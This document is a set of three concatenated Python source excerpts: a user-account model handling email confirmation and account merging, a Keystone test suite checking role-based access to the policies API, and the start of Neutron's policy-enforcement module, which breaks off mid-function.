mails.send_mail(to_addr=email,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='primary email address ({})'.format(self.username))
def get_confirmation_token(self, email, force=False):
"""Return the confirmation token for a given email.
:param str email: Email to get the token for.
:param bool force: If an expired token exists for the given email, generate a new
token and return that token.
:raises: ExpiredTokenError if trying to access a token that is expired and force=False.
:raises: KeyError if there no token for the email.
"""
# TODO: Refactor "force" flag into User.get_or_add_confirmation_token
for token, info in self.email_verifications.items():
if info['email'].lower() == email.lower():
# Old records will not have an expiration key. If it's missing,
# assume the token is expired
expiration = info.get('expiration')
if not expiration or (expiration and expiration < dt.datetime.utcnow()):
if not force:
raise ExpiredTokenError('Token for email "{0}" is expired'.format(email))
else:
new_token = self.add_unconfirmed_email(email)
self.save()
return new_token
return token
raise KeyError('No confirmation token for email "{0}"'.format(email))
def get_confirmation_url(self, email, external=True, force=False):
"""Return the confirmation url for a given email.
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: KeyError if there is no token for the email.
"""
base = settings.DOMAIN if external else '/'
token = self.get_confirmation_token(email, force=force)
return "{0}confirm/{1}/{2}/".format(base, self._primary_key, token)
def _get_unconfirmed_email_for_token(self, token):
"""Return whether or not a confirmation token is valid for this user.
:rtype: bool
"""
if token not in self.email_verifications:
raise exceptions.InvalidTokenError()
verification = self.email_verifications[token]
# Not all tokens are guaranteed to have expiration dates
if (
'expiration' in verification and
verification['expiration'] < dt.datetime.utcnow()
):
raise exceptions.ExpiredTokenError()
return verification['email']
def verify_claim_token(self, token, project_id):
"""Return whether or not a claim token is valid for this user for
a given node which they were added as a unregistered contributor for.
"""
try:
record = self.get_unclaimed_record(project_id)
except ValueError: # No unclaimed record for given pid
return False
return record['token'] == token
def confirm_email(self, token, merge=False):
"""Confirm the email address associated with the token"""
email = self._get_unconfirmed_email_for_token(token)
# If this email is confirmed on another account, abort
try:
user_to_merge = User.find_one(Q('emails', 'iexact', email))
except NoResultsFound:
user_to_merge = None
if user_to_merge and merge:
self.merge_user(user_to_merge)
elif user_to_merge:
raise exceptions.MergeConfirmedRequiredError(
'Merge requires confirmation',
user=self,
user_to_merge=user_to_merge,
)
# If another user has this email as its username, get it
try:
unregistered_user = User.find_one(Q('username', 'eq', email) &
Q('_id', 'ne', self._id))
except NoResultsFound:
unregistered_user = None
if unregistered_user:
self.merge_user(unregistered_user)
self.save()
unregistered_user.username = None
if email not in self.emails:
self.emails.append(email)
# Complete registration if primary email
if email.lower() == self.username.lower():
self.register(self.username)
self.date_confirmed = dt.datetime.utcnow()
# Revoke token
del self.email_verifications[token]
# TODO: We can't assume that all unclaimed records are now claimed.
# Clear unclaimed records, so user's name shows up correctly on
# all projects
self.unclaimed_records = {}
self.save()
self.update_search_nodes()
return True
@property
def unconfirmed_emails(self):
# Handle when email_verifications field is None
email_verifications = self.email_verifications or {}
return [
each['email']
for each
in email_verifications.values()
]
def update_search_nodes(self):
"""Call `update_search` on all nodes on which the user is a
contributor. Needed to add self to contributor lists in search upon
registration or claiming.
"""
for node in self.node__contributed:
node.update_search()
def update_search_nodes_contributors(self):
"""
Bulk update contributor name on all nodes on which the user is
a contributor.
:return:
"""
from website.search import search
search.update_contributors(self.visible_contributor_to)
@property
def is_confirmed(self):
return bool(self.date_confirmed)
@property
def social_links(self):
return {
key: self.SOCIAL_FIELDS[key].format(val)
for key, val in self.social.items()
if val and
self.SOCIAL_FIELDS.get(key)
}
@property
def biblio_name(self):
given_names = self.given_name + ' ' + self.middle_names
surname = self.family_name
if surname != given_names:
initials = [
name[0].upper() + '.'
for name in given_names.split(' ')
if name and re.search(r'\w', name[0], re.I)
]
return u'{0}, {1}'.format(surname, ' '.join(initials))
return surname
@property
def given_name_initial(self):
"""
The user's preferred initialization of their given name.
Some users with common names may choose to distinguish themselves from
their colleagues in this way. For instance, there could be two
well-known researchers in a single field named "Robert Walker".
"Walker, R" could then refer to either of them. "Walker, R.H." could
provide easy disambiguation.
NOTE: The internal representation for this should never end with a
period. "R" and "R.H" would be correct in the prior case, but
"R.H." would not.
"""
return self.given_name[0]
@property
def url(self):
return '/{}/'.format(self._primary_key)
@property
def api_url(self):
return '/api/v1/profile/{0}/'.format(self._primary_key)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def display_absolute_url(self):
url = self.absolute_url
if url is not None:
return re.sub(r'https?:', '', url).strip('/')
@property
def deep_url(self):
return '/profile/{}/'.format(self._primary_key)
@property
def gravatar_url(self):
return filters.gravatar(
self,
use_ssl=True,
size=settings.GRAVATAR_SIZE_ADD_CONTRIBUTOR
)
def get_activity_points(self, db=None):
db = db or framework.mongo.database
return analytics.get_total_activity_count(self._primary_key, db=db)
@property
def is_disabled(self):
"""Whether or not this account has been disabled.
Abstracts ``User.date_disabled``.
:return: bool
"""
return self.date_disabled is not None
@is_disabled.setter
def is_disabled(self, val):
"""Set whether or not this account has been disabled."""
if val:
self.date_disabled = dt.datetime.utcnow()
else:
self.date_disabled = None
@property
def is_merged(self):
'''Whether or not this account has been merged into another account.
'''
return self.merged_by is not None
@property
def profile_url(self):
return '/{}/'.format(self._id)
@property
def contributor_to(self):
return (
node for node in self.node__contributed
if not (
node.is_deleted
or node.is_dashboard
)
)
@property
def visible_contributor_to(self):
return (
node for node in self.contributor_to
if self._id in node.visible_contributor_ids
)
def get_summary(self, formatter='long'):
return {
'user_fullname': self.fullname,
'user_profile_url': self.profile_url,
'user_display_name': name_formatters[formatter](self),
'user_is_claimed': self.is_claimed
}
def save(self, *args, **kwargs):
# TODO: Update mailchimp subscription on username change
# Avoid circular import
from framework.analytics import tasks as piwik_tasks
self.username = self.username.lower().strip() if self.username else None
ret = super(User, self).save(*args, **kwargs)
if self.SEARCH_UPDATE_FIELDS.intersection(ret) and self.is_confirmed:
self.update_search()
self.update_search_nodes_contributors()
if settings.PIWIK_HOST and not self.piwik_token:
piwik_tasks.update_user(self._id)
return ret
def update_search(self):
from website import search
try:
search.search.update_user(self)
except search.exceptions.SearchUnavailableError as e:
logger.exception(e)
log_exception()
@classmethod
def find_by_email(cls, email):
try:
user = cls.find_one(
Q('emails', 'eq', email)
)
return [user]
except:
return []
def serialize(self, anonymous=False):
return {
'id': utils.privacy_info_handle(self._primary_key, anonymous),
'fullname': utils.privacy_info_handle(self.fullname, anonymous, name=True),
'registered': self.is_registered,
'url': utils.privacy_info_handle(self.url, anonymous),
'api_url': utils.privacy_info_handle(self.api_url, anonymous),
}
###### OSF-Specific methods ######
def watch(self, watch_config):
"""Watch a node by adding its WatchConfig to this user's ``watched``
list. Raises ``ValueError`` if the node is already watched.
:param watch_config: The WatchConfig to add.
:param save: Whether to save the user.
"""
watched_nodes = [each.node for each in self.watched]
if watch_config.node in watched_nodes:
raise ValueError('Node is already being watched.')
watch_config.save()
self.watched.append(watch_config)
return None
def unwatch(self, watch_config):
"""Unwatch a node by removing its WatchConfig from this user's ``watched``
list. Raises ``ValueError`` if the node is not already being watched.
:param watch_config: The WatchConfig to remove.
:param save: Whether to save the user.
"""
for each in self.watched:
if watch_config.node._id == each.node._id:
each.__class__.remove_one(each)
return None
raise ValueError('Node not being watched.')
def is_watching(self, node):
'''Return whether a not a user is watching a Node.'''
watched_node_ids = set([config.node._id for config in self.watched])
return node._id in watched_node_ids
def get_recent_log_ids(self, since=None):
'''Return a generator of recent logs' ids.
:param since: A datetime specifying the oldest time to retrieve logs
from. If ``None``, defaults to 60 days before today. Must be a tz-aware
datetime because PyMongo's generation times are tz-aware.
:rtype: generator of log ids (strings)
'''
log_ids = []
# Default since to 60 days before today if since is None
# timezone aware utcnow
utcnow = dt.datetime.utcnow().replace(tzinfo=pytz.utc)
since_date = since or (utcnow - dt.timedelta(days=60))
for config in self.watched:
# Extract the timestamps for each log from the log_id (fast!)
# The first 4 bytes of Mongo's ObjectId encodes time
# This prevents having to load each Log Object and access their
# date fields
node_log_ids = [log_id for log_id in config.node.logs._to_primary_keys()
if bson.ObjectId(log_id).generation_time > since_date and
log_id not in log_ids]
# Log ids in reverse chronological order
log_ids = _merge_into_reversed(log_ids, node_log_ids)
return (l_id for l_id in log_ids)
def get_daily_digest_log_ids(self):
'''Return a generator of log ids generated in the past day
(starting at UTC 00:00).
'''
utcnow = dt.datetime.utcnow()
midnight = dt.datetime(
utcnow.year, utcnow.month, utcnow.day,
0, 0, 0, tzinfo=pytz.utc
)
return self.get_recent_log_ids(since=midnight)
@property
def can_be_merged(self):
"""The ability of the `merge_user` method to fully merge the user"""
return all((addon.can_be_merged for addon in self.get_addons()))
def merge_user(self, user):
"""Merge a registered user into this account. This user will be
a contributor on any project. if the registered user and this account
are both contributors of the same project. Then it will remove the
registered user and set this account to the highest permission of the two
and set this account to be visible if either of the two are visible on
the project.
:param user: A User object to be merged.
"""
# Fail if the other user has conflicts.
if not user.can_be_merged:
raise exceptions.MergeConflictError("Users cannot be merged")
# Move over the other user's attributes
# TODO: confirm
for system_tag in user.system_tags:
if system_tag not in self.system_tags:
self.system_tags.append(system_tag)
self.is_claimed = self.is_claimed or user.is_claimed
self.is_invited = self.is_invited or user.is_invited
# copy over profile only if this user has no profile info
if user.jobs and not self.jobs:
self.jobs = user.jobs
if user.schools and not self.schools:
self.schools = user.schools
if user.social and not self.social:
self.social = user.social
unclaimed = user.unclaimed_records.copy()
unclaimed.update(self.unclaimed_records)
self.unclaimed_records = unclaimed
# - unclaimed records should be connected to only one user
user.unclaimed_records = {}
security_messages = user.security_messages.copy()
security_messages.update(self.security_messages)
self.security_messages = security_messages
for key, value in user.mailing_lists.iteritems():
# subscribe to each list if either user was subscribed
subscription = value or self.mailing_lists.get(key)
signals.user_merged.send(self, list_name=key, subscription=subscription)
# clear subscriptions for merged user
signals.user_merged.send(user, list_name=key, subscription=False)
for node_id, timestamp in user.comments_viewed_timestamp.iteritems():
if not self.comments_viewed_timestamp.get(node_id):
self.comments_viewed_timestamp[node_id] = timestamp
elif timestamp > self.comments_viewed_timestamp[node_id]:
self.comments_viewed_timestamp[node_id] = timestamp
self.emails.extend(user.emails)
user.emails = []
for k, v in user.email_verifications.iteritems():
email_to_confirm = v['email']
if k not in self.email_verifications and email_to_confirm != user.username:
self.email_verifications[k] = v
user.email_verifications = {}
# FOREIGN FIELDS
for watched in user.watched:
if watched not in self.watched:
self.watched.append(watched)
user.watched = []
for account in user.external_accounts:
if account not in self.external_accounts:
self.external_accounts.append(account)
user.external_accounts = []
# - addons
# Note: This must occur before the merged user is removed as a
# contributor on the nodes, as an event hook is otherwise fired
# which removes the credentials.
for addon in user.get_addons():
user_settings = self.get_or_add_addon(addon.config.short_name)
user_settings.merge(addon)
user_settings.save()
# - projects where the user was a contributor
for node in user.node__contributed:
# Skip dashboard node
if node.is_dashboard:
continue
# if both accounts are contributor of the same project
if node.is_contributor(self) and node.is_contributor(user):
if node.permissions[user._id] > node.permissions[self._id]:
permissions = node.permissions[user._id]
else:
permissions = node.permissions[self._id]
node.set_permissions(user=self, permissions=permissions)
visible1 = self._id in node.visible_contributor_ids
visible2 = user._id in node.visible_contributor_ids
if visible1 != visible2:
node.set_visible(user=self, visible=True, log=True, auth=Auth(user=self))
else:
node.add_contributor(
contributor=self,
permissions=node.get_permissions(user),
visible=node.get_visible(user),
log=False,
)
try:
node.remove_contributor(
contributor=user,
auth=Auth(user=self),
log=False,
)
except ValueError:
logger.error('Contributor {0} not in list on node {1}'.format(
user._id, node._id
))
node.save()
# - projects where the user was the creator
for node in user.node__created:
node.creator = self
node.save()
# finalize the merge
remove_sessions_for_user(user)
# - username is set to None so the resultant user can set it primary
# in the future.
user.username = None
user.password = None
user.verification_key = None
user.merged_by = self
user.save()
def get_projects_in_common(self, other_user, primary_keys=True):
"""Returns either a collection of "shared projects" (projects that both users are contributors for)
or just their primary keys
"""
if primary_keys:
projects_contributed_to = set(self.node__contributed._to_primary_keys())
return projects_contributed_to.intersection(other_user.node__contributed._to_primary_keys())
else:
projects_contributed_to = set(self.node__contributed)
return projects_contributed_to.intersection(other_user.node__contributed)
def n_projects_in_common(self, other_user):
"""Returns number of "shared projects" (projects that both users are contributors for)"""
return len(self.get_projects_in_common(other_user, primary_keys=True))
def _merge_into_reversed(*iterables):
'''Merge multiple sorted inputs into a single output in reverse order.
'''
return sorted(itertools.chain(*iterables), reverse=True)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
import http.client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserPoliciesTests(object):
"""Common default functionality for all system users."""
def test_user_can_list_policies(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
r = c.get('/v3/policies', headers=self.headers)
policies = []
for policy in r.json['policies']:
policies.append(policy['id'])
self.assertIn(policy['id'], policies)
def test_user_can_get_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.get('/v3/policies/%s' % policy['id'],
headers=self.headers)
class _SystemReaderAndMemberPoliciesTests(object):
"""Common default functionality for system readers and system members."""
def test_user_cannot_create_policy(self):
create = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
# Store serialized JSON data as the blob to mimic real world usage.
'blob': json.dumps({'data': uuid.uuid4().hex, }),
'type': uuid.uuid4().hex,
}
with self.test_client() as c:
c.post(
'/v3/policies', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
update = {'policy': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/policies/%s' % policy['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.delete(
'/v3/policies/%s' % policy['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class _DomainAndProjectUserPolicyTests(object):
def test_user_cannot_list_policies(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.get('/v3/policies', headers=self.headers,
expected_status_code=http.client.FORBIDDEN)
def test_user_cannot_get_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.get('/v3/policies/%s' % policy['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN)
def test_user_cannot_create_policy(self):
create = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
# Store serialized JSON data as the blob to mimic real world usage.
'blob': json.dumps({'data': uuid.uuid4().hex, }),
'type': uuid.uuid4().hex,
}
with self.test_client() as c:
c.post(
'/v3/policies', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
update = {'policy': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/policies/%s' % policy['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.delete(
'/v3/policies/%s' % policy['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserPoliciesTests,
_SystemReaderAndMemberPoliciesTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserPoliciesTests,
_SystemReaderAndMemberPoliciesTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_member = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_member
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.member_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_member['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserPoliciesTests):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
# Reuse the system administrator account created during
# ``keystone-manage bootstrap``
self.user_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.user_id,
password=self.bootstrapper.admin_password,
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_can_create_policy(self):
create = {
'policy': {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
# Store serialized JSON data as the blob to mimic real world
# usage.
'blob': json.dumps({'data': uuid.uuid4().hex, }),
'type': uuid.uuid4().hex
}
}
with self.test_client() as c:
c.post(
'/v3/policies', json=create, headers=self.headers
)
def test_user_can_update_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
update = {'policy': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/policies/%s' % policy['id'], json=update,
headers=self.headers
)
def test_user_can_delete_policy(self):
policy = unit.new_policy_ref()
policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)
with self.test_client() as c:
c.delete(
'/v3/policies/%s' % policy['id'], headers=self.headers
)
class DomainUserTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserPolicyTests):
def setUp(self):
super(DomainUserTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
domain_admin = unit.new_user_ref(domain_id=self.domain_id)
self.user_id = PROVIDERS.identity_api.create_user(domain_admin)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.admin_role_id, user_id=self.user_id,
domain_id=self.domain_id
)
auth = self.build_authentication_request(
user_id=self.user_id,
password=domain_admin['password'],
domain_id=self.domain_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectUserTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserPolicyTests):
def setUp(self):
super(ProjectUserTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
self.user_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.user_id,
password=self.bootstrapper.admin_password,
project_id=self.bootstrapper.project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectUserTestsWithoutEnforceScope(
base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserPolicyTests):
def setUp(self):
super(ProjectUserTestsWithoutEnforceScope, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
# Explicityly set enforce_scope to False to make sure we maintain
# backwards compatibility with project users.
self.config_fixture.config(group='oslo_policy', enforce_scope=False)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
user = unit.new_user_ref(domain_id=domain['id'])
self.user_id = PROVIDERS.identity_api.create_user(user)['id']
self.project_id = PROVIDERS.resource_api.create_project(
uuid.uuid4().hex, unit.new_project_ref(domain_id=domain['id'])
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.member_role_id, user_id=self.user_id,
project_id=self.project_id
)
auth = self.build_authentication_request(
user_id=self.user_id,
password=user['password'],
project_id=self.project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Policy engine for neutron. Largely copied from nova.
"""
import itertools
import re
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import exceptions
import neutron.common.utils as utils
from neutron import manager
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import policy
LOG = logging.getLogger(__name__)
_POLICY_PATH = None
_POLICY_CACHE = {}
ADMIN_CTX_POLICY = 'context_is_admin'
# Maps deprecated 'extension' policies to new-style policies
DEPRECATED_POLICY_MAP = {
'extension:provider_network':
['network:provider:network_type',
'network:provider:physical_network',
'network:provider:segmentation_id'],
'extension:router':
['network:router:external'],
'extension:port_binding':
['port:binding:vif_type', 'port:binding:capabilities',
'port:binding:profile', 'port:binding:host_id']
}
DEPRECATED_ACTION_MAP = {
'view': ['get'],
'set': ['create', 'update']
}
cfg.CONF.import_opt('policy_file', 'neutron.common.config')
def reset():
global _POLICY_PATH
global _POLICY_CACHE
_POLICY_PATH = None
_POLICY_CACHE = {}
policy.reset()
def init():
global _POLICY_PATH
global _POLICY_CACHE
if not _POLICY_PATH:
_POLICY_PATH = utils.find_config_file({}, cfg.CONF.policy_file)
if not _POLICY_PATH:
raise exceptions.PolicyFileNotFound(path=cfg.CONF.policy_file)
# pass _set_brain to read_cached_file so that the policy brain
# is reset only if the file has changed
utils.read_cached_file(_POLICY_PATH, _POLICY_CACHE,
reload_func=_set_rules)
def get_resource_and_action(action):
"""Extract resource and action (write, read) from api operation."""
data = action.split(':', 1)[0].split('_', 1)
return ("%ss" % data[-1], data[0] != 'get')
def _set_rules(data):
default_rule = 'default'
LOG.debug(_("loading policies from file: %s"), _POLICY_PATH)
# Ensure backward compatibility with folsom/grizzly convention
# for extension rules
policies = policy.Rules.load_json(data, default_rule)
for pol in policies.keys():
if any([pol.startswith(depr_pol) for depr_pol in
DEPRECATED_POLICY_MAP.keys()]):
LOG.warn(_("Found deprecated policy rule:%s. Please consider "
"upgrading your policy configuration file"), pol)
pol_name, action = pol.rsplit(':', 1)
try:
new_actions = DEPRECATED_ACTION_MAP[action]
new_policies = DEPRECATED_POLICY_MAP[pol_name]
# bind new actions and policies together
for actual_policy in ['_'.join(item) for item in
itertools.product(new_actions,
new_policies)]:
if actual_policy not in policies:
# New policy, same rule
LOG.info(_("Inserting policy:%(new_policy)s in place "
"of deprecated policy:%(old_policy)s"),
{'new_policy': actual_policy,
'old_policy': pol})
policies[actual_policy] = policies[pol]
# Remove old-style policy
del policies[pol]
except KeyError:
LOG.error(_("Backward compatibility unavailable for "
"deprecated policy %s. The policy will "
"not be enforced"), pol)
policy.set_rules(policies)
def _is_attribute_explicitly_set(attribute_name, resource, target):
"""Verify that an attribute is present and has a non-default value."""
return ('default' in resource[attribute_name] and
attribute_name in target and
target[attribute_name] is not attributes.ATTR_NOT_SPECIFIED and
target[attribute_name] != resource[attribute_name]['default'])
def _build_subattr_match_rule(attr_name, attr, action, target):
"""Create the rule to match for sub-attribute policy checks."""
# TODO(salv-orlando): Instead of relying on validator info, introduce
# typing for API attributes
# Expect a dict as type descriptor
validate = attr['validate']
key = filter(lambda k: k.startswith('type:dict'), validate.keys())
if not key:
LOG.warn(_("Unable to find data type descriptor for attribute %s"),
attr_name)
return
data = validate[key[0]]
if not isinstance(data, dict):
LOG.debug(_("Attribute type descriptor is not a dict. Unable to "
"generate any sub-attr policy rule for %s."),
attr_name)
return
sub_attr_rules = [policy.RuleCheck('rule', '%s:%s:%s' %
(action, attr_name,
sub_attr_name)) for
sub_attr_name in data if sub_attr_name in
target[attr_name]]
return policy.AndCheck(sub_attr_rules)
def _build_match_rule(action, target):
"""Create the rule to match for a given action.
The policy rule to be matched is built in the following way:
1) add entries for matching permission on objects
2) add an entry for the specific action (e.g.: create_network)
3) add an entry for attributes of a resource for which the action
is being executed (e.g.: create_network:shared)
4) add an entry for sub-attributes of a resource for which the
action is being executed
(e.g.: create_router:external_gateway_info:network_id)
"""
match_rule = policy.RuleCheck('rule', action)
resource, is_write = get_resource_and_action(action)
# Attribute-based checks shall not be enforced on GETs
if is_write:
# assigning to variable with short name for improving readability
res_map = attributes.RESOURCE_ATTRIBUTE_MAP
if resource in res_map:
for attribute_name in res_map[resource]:
if _is_attribute_explicitly_set(attribute_name,
res_map[resource],
target):
attribute = res_map[resource][attribute_name]
if 'enforce_policy' in attribute:
attr_rule = policy.RuleCheck('rule', '%s:%s' %
(action, attribute_name))
# Build match entries for sub-attributes, if present
validate = attribute.get('validate')
if (validate and any([k.startswith('type:dict') and v
for (k, v) in
validate.iteritems()])):
attr_rule = policy.AndCheck(
[attr_rule, _build_subattr_match_rule(
attribute_name, attribute,
action, target)])
match_rule = policy.AndCheck([match_rule, attr_rule])
return match_rule
# This check is registered as 'tenant_id' so that it can override
# GenericCheck which was used for validating parent resource ownership.
# This will prevent us from having to handling backward compatibility
# for policy.json
# TODO(salv-orlando): Reinstate GenericCheck for simple tenant_id checks
@policy.register('tenant_id')
class OwnerCheck(policy.Check):
"""Resource ownership check.
This check verifies the owner of the current resource, or of another
resource referenced by the one under analysis.
In the former case it falls back to a regular GenericCheck, whereas
in the latter case it leverages the plugin to load the referenced
resource and perform the check.
"""
def __init__(self, kind, match):
# Process the match
try:
self.target_field = re.findall('^\%\((.*)\)s$',
match)[0]
except IndexError:
err_reason = (_("Unable to identify a target field from:%s."
"match should be in the form %%(<field_name>)s") %
match)
LOG.exception(err_reason)
raise exceptions.PolicyInitError(
policy="%s:%s" % (kind, match),
reason=err_reason)
super(OwnerCheck, self).__init__(kind, match)
def __call__(self, target, creds):
if self.target_field not in target:
# policy needs a plugin check
# target field is in the form resource:field
# however if they're not separated by a colon, use an underscore
# as a separator for backward compatibility
def do_split(separator):
parent_res, parent_field = self.target_field.split(
separator, 1)
return parent_res, parent_field
for separator in (':', '_'):
try:
parent_res, parent_field = do_split(separator)
break
except ValueError:
LOG.debug(_("Unable to find ':' as separator in %s."),
self.target_field)
else:
# If we are here split failed with both separators
err_reason = (_("Unable to find resource name in %s") %
self.target_field)
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
parent_foreign_key = attributes.RESOURCE_FOREIGN_KEYS.get(
"%ss" % parent_res, None)
if not parent_foreign_key:
err_reason = (_("Unable to verify match:%(match)s as the "
"parent resource: %(res)s was not found") %
{'match': self.match, 'res': parent_res})
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
# NOTE(salv-orlando): This check currently assumes the parent
# resource is handled by the core plugin. It might be worth
# having a way to map resources to plugins so to make this
# check more general
f = getattr(manager.NeutronManager.get_instance().plugin,
'get_%s' % parent_res)
# f *must* exist, if not found it is better to let neutron
# explode. Check will be performed with admin context
context = importutils.import_module('neutron.context')
try:
data = f(context.get_admin_context(),
target[parent_foreign_key],
fields=[parent_field])
target[self.target_field] = data[parent_field]
except Exception:
